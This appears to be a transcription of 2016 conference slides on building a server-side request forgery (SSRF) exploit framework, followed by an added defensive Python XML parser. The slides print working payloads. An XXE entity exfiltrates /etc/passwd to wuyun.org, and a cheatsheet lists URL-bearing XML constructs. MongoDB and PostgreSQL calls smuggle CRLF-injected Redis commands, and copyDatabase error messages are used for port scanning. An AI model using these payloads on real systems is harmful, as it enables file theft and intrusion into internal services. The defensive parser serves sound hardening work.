Build Your SSRF Exploit Framework
@ringzero

Outline
• KNOW IT: SSRF
• HACK IT: SSRF
• HOW: SSRF

KNOW IT, SSRF?

Topology from the slide: Web Interface -> SSRF_Interface on the APP server -> internal Redis server and HTTP server (ports 80 & 8080).
Example request through the interface: http://10.10.10.10:8080/manager/images/tomcat.gif

What the SSRF interface gives:
• FingerPrint ({Payload} responses)
• DOS (Keep-Alive Always)
• users / dirs / files
• SSRF request to MongoDB, MemCache, Redis-Server
• OpenSSL (100%): TLS HELLO via SSRF to OpenSSL on the internal WEB SERVER; SSL can expose Cookies, USER & PASS
• 1024 DOS *

KNOW IT, SSRF: where it appears
• Features: Upload from URL, Import & Export RSS feed
• Databases: Oracle, MongoDB, MSSQL, Postgres, CouchDB
• Webmail: POP3/IMAP/SMTP
• File processing: ffmpeg, ImageMagick, DOCX, PDF, XML

Examples:
• Upload from URL: Discuz!
• Import & Export RSS feed: Web Blog
• XML: Wordpress xmlrpc.php SSRF
• XML -> SSRF: XXE, DTD, XSLT
XSLT pipeline: Template (XML + XSLT) -> XSLT Processor (Saxon) -> Output
XML Fuzz Cheatsheet (Files)

• DTD Remote Access
<!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd">

• XML External Entity
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % d SYSTEM "http://wuyun.org/file?data=%file">

• URL Invocation
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://wuyun.org/urlin">
<roottag>test</roottag>

• XML Encryption
<xenc:AgreementMethod Algorithm="http://wuyun.org/1">
<xenc:EncryptionProperty Target="http://wuyun.org/2">
<xenc:CipherReference URI="http://wuyun.org/3">
<xenc:DataReference URI="http://wuyun.org/4">

XML Fuzz Cheatsheet (Web Services)

• XML Signature
<Reference URI="http://wuyun.org/5">

• WS Policy (SOA WS)
<wsp:PolicyReference URI="http://wuyun.org/pr">

• WS Addressing (Web Services) / From WS Security (JAVA WEB)
<To xmlns="http://www.w3.org/2005/08/addressing">http://wuyun.org/to</To>
<ReplyTo xmlns="http://www.w3.org/2005/08/addressing">
<Address>http://wuyun.org/rto</Address>
</ReplyTo>
<input message="wooyun" wsa:Action="http://wuyun.org/ip" />
<output message="wooyun" wsa:Action="http://wuyun.org/op" />

• WS Federation (Web Services)
<fed:Federation FederationID="http://wuyun.org/fid">
<fed:FederationInclude>http://wuyun.org/inc</fed:FederationInclude>
<fed:TokenIssuerName>http://wuyun.org/iss</fed:TokenIssuerName>
<mex:MetadataReference>
<wsa:Address>http://wuyun.org/mex</wsa:Address>
</mex:MetadataReference>

• XBRL
<xbrli:identifier scheme="http://wuyun.org/xbr">
<link:roleType roleURI="http://wuyun.org/role">

• ODATA (edmx)
<edmx:Reference URI="http://wuyun.org/edmxr">
<edmx:AnnotationsReference URI="http://wuyun.org/edmxa">

• STRATML
<stratml:Source>http://wuyun.org/stml</stratml:Source>

(MongoDB) -> SSRF

copyDatabase() makes the MongoDB server open a TCP connection to the host:port it is given; the \r\n inside the database-name argument reach the listener as separate lines:

> db.copyDatabase('\r\nconfig set dbfilename wyssrf\r\nquit\r\n','test','10.6.4.166:6379')

[root@10-6-4-166 ~]# nc -l -vv 6379
Connection from 10.6.19.144 port 6379 [tcp/*]
config set dbfilename wyssrf
quit

.system.namespaces 50000+

The error text returned by copyDatabase() differs with the state of the port:

> db.copyDatabase('helo','test','10.6.4.166:22');
{"errmsg" : "……helo.systemnamespaces failed: " }

> db.copyDatabase('helo','test','10.6.4.166:9999');
{"errormsg" : "couldn't connect to server 10.6.4.166:9999"}

(Oracle) -> SSRF
• UTL_HTTP
• UTL_TCP
• UTL_SMTP
http://docs.oracle.com/cd/E11882_01/appdev.112/e40758/u_http.htm

(PostgreSQL) -> SSRF
• dblink_send_query()

SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n\' password=1 port=6379 sslmode=disable', 'select version();');

[root@localhost ~]# nc -l -vv 6379
Connection from 127.0.0.1 port 6379 [tcp/*]
config set dbfilename wyssrf
quit
https://www.postgresql.org/docs/8.4/static/dblink.html
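Every entry in the XML Fuzz Cheatsheet above is either a DOCTYPE/entity construct or an element or attribute whose value is a URL that some consumer (XML Encryption, WS-Policy, WS-Addressing, WS-Federation, XBRL, OData, StratML) will fetch. The parser below is an added example, not code from the slides: it refuses DOCTYPE declarations, entity declarations and external entity references outright (which covers the DTD Remote Access, XML External Entity and URL Invocation entries) and collects the URL-bearing values so they can be passed through an outbound allowlist before any of those formats is processed. `scan_untrusted_xml`, the `URL_ATTRS` / `URL_ELEMENTS` name sets and the two sample documents are constructed for this example.

```python
"""Hardened parse of untrusted XML plus extraction of URL-bearing values.

Added example; not code from the original slides. scan_untrusted_xml, the
name sets and the sample documents are constructed for this example.
"""
import xml.parsers.expat as expat

# Attribute names that carry a fetchable URL in the cheatsheet's formats
# (XML Signature/Encryption, WS-Policy, WS-Addressing, WS-Federation, XBRL, OData).
URL_ATTRS = {"URI", "roleURI", "scheme", "Algorithm", "Target",
             "FederationID", "Action"}
# Elements whose text content is a URL (WS-Addressing, WS-Federation, StratML).
URL_ELEMENTS = {"To", "Address", "FederationInclude", "TokenIssuerName", "Source"}


class UnsafeXML(Exception):
    """Raised from inside a handler to stop expat on a forbidden construct."""


def scan_untrusted_xml(data):
    """Return (True, refs) or (False, reason).

    refs is a list of (where, url): "Element" for text content and
    "Element@attr" for attributes. Every DOCTYPE, entity declaration and
    external entity reference is refused before anything is resolved.
    """
    refs, stack = [], []
    p = expat.ParserCreate()           # no namespace processing: prefixes stay literal

    def local(name):                   # strip any prefix: "wsa:Action" -> "Action"
        return name.rsplit(":", 1)[-1]

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE refused")

    def on_entity_decl(*_):
        raise UnsafeXML("entity declaration refused")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity {sysid!r} refused")

    def on_start(name, attrs):
        stack.append((local(name), []))
        for key, value in attrs.items():
            if local(key) in URL_ATTRS and "://" in value:
                refs.append((f"{local(name)}@{local(key)}", value))

    def on_chars(text):
        if stack:                      # text may arrive in several chunks
            stack[-1][1].append(text)

    def on_end(name):
        elem, chunks = stack.pop()
        text = "".join(chunks).strip()
        if elem in URL_ELEMENTS and "://" in text:
            refs.append((elem, text))

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_entity
    p.StartElementHandler = on_start
    p.CharacterDataHandler = on_chars
    p.EndElementHandler = on_end
    try:
        p.Parse(data, True)
    except UnsafeXML as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, refs


# Constructed sample documents assembled from the cheatsheet's own entries.
SAMPLE_SOAP = """<?xml version="1.0"?>
<Envelope>
  <To xmlns="http://www.w3.org/2005/08/addressing">http://wuyun.org/to</To>
  <ReplyTo xmlns="http://www.w3.org/2005/08/addressing">
    <Address>http://wuyun.org/rto</Address>
  </ReplyTo>
  <wsp:PolicyReference URI="http://wuyun.org/pr"/>
  <fed:Federation FederationID="http://wuyun.org/fid"/>
  <stratml:Source>http://wuyun.org/stml</stratml:Source>
</Envelope>"""

SAMPLE_XXE = """<?xml version="1.0"?>
<!DOCTYPE roottag [ <!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd"> %d; ]>
<roottag>test</roottag>"""

SAMPLE_URL_INVOCATION = """<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://wuyun.org/urlin">
<roottag>test</roottag>"""

if __name__ == "__main__":
    for doc in (SAMPLE_SOAP, SAMPLE_XXE, SAMPLE_URL_INVOCATION):
        print(scan_untrusted_xml(doc))
```

Refusing the DOCTYPE as a whole is simpler and safer than trying to tell a harmless internal subset from a parameter-entity chain, and it is the check that stops the PUBLIC/SYSTEM identifier of the URL Invocation entry from ever being looked up. The collected references are the values the WS-*/XBRL/OData layers would otherwise dereference on the server's behalf, so they are exactly what an outbound allowlist has to see first.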
2016, "Build Your SSRF Exploit Framework"
This document was uploaded and shared by 张玉竹 on 2022-04-08 09:06:55.